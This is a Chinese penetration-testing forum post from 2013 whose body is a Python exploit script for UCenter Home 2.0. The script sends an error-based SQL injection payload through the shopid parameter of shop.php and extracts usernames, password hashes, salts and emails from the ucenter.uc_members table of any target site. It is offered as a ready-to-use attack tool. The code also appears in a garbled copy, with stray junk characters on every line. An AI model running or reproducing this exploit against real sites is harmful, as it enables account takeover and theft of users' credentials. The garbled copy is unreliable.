找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2546|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl3 a) v+ ]. f" K, Y; _
7 w1 V6 X. v$ Q8 w/ h7 N9 w
$ y. S  L, r8 L7 Q9 I; e3 I7 {8 T% H
#!/usr/bin/env python  % i$ L# ]3 S0 T6 b' P% @

, t' [* M3 W. y) aimport sys  ( e2 E. x- ~1 R% e% w: t$ D' a( H
import urllib2  
2 Q, A! c$ C+ _import re  & P' D, e2 J3 g6 V, a
1 R$ E7 M3 T& K' N. t1 ?# M
def info():  
4 j+ q1 e+ ^1 T" y3 m    print 'From:http://www.exploit-db.com/exploits/14997/'
$ J" ?+ V: o: I( u    print 'http://www.hake.cc/Web_loudong/' 5 M, z" o, h/ ?* j
    print 'changed:qiaoy'  , l, ~/ m/ G/ B) R. P
    print 'exp:'  ' w1 c9 `! i1 K5 _) S
    print ' ./UCenter_Home_2.0.py site'  
6 k" N& _- X! I, O
' A; A8 _/ {% g' l+ `def main():  ! g( H: r9 p0 Y# b# O% A$ b
    if len(sys.argv) != 2:  
* P! K' W9 i" i% M3 x8 R$ ?! }& F        info()  
- f. m1 V: R0 V3 c' Y3 q' P    else:  6 p5 t3 c  l! f. X
        site = sys.argv[1]  + h8 R7 p. c  _$ P+ W6 f
        if site[0:7] == 'http://':  
: q9 g, n; i' o' ]3 `" E+ n( _            sitesite =site  . D) [! w3 w# n6 [& s- \/ A
        elif site[0:8] == 'https://':  
' Z) U( P9 f, z' O, H            sitesite = site  : z' {; E- Q% c0 g0 K+ x  g
        else:  / B. B2 Z1 p% A3 V. V* _
            site = 'http://'+site  $ j6 Q/ j# z  t0 l# ?" D4 }
        try:  0 i9 B5 h" _" B. @
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'    ^2 @+ Q3 r6 G' w) x7 O
            Value = urllib2.urlopen(url).read()  % g1 y8 f* q& v4 b
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
7 I' z1 c" @2 o" e2 f( a% f            hacked = Msg.split(':')  7 B$ T7 i: j4 _3 M) a: i( g
            print 'Name:    '+hacked[1]  " E- c9 |" p, a0 X# S& w' J! E/ r3 n
            print 'Passwd:  '+hacked[2]  
# A: x1 d% f/ X& s( Y* e: V- [            print 'salt:    '+hacked[3]  
* @& O7 i! N3 m( @2 q- ^5 B6 s            print 'email:   '+hacked[4]  
1 T# g* b! L) Q/ p8 i5 F4 m        except:  / `8 ~$ Q7 v) G+ |% O) N
            print 'Sorry,I can\'t work............'  ) A" T0 I6 X% M: l, n+ g) H

, p/ D# e( O/ L$ J# ]if __name__ == '__main__':  9 J0 w8 M1 Y% D+ g( n* N) l: e: E
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表